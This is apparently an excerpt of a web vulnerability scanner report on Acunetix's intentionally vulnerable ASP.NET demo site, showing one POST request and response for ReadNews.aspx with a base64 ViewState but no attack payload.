href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, 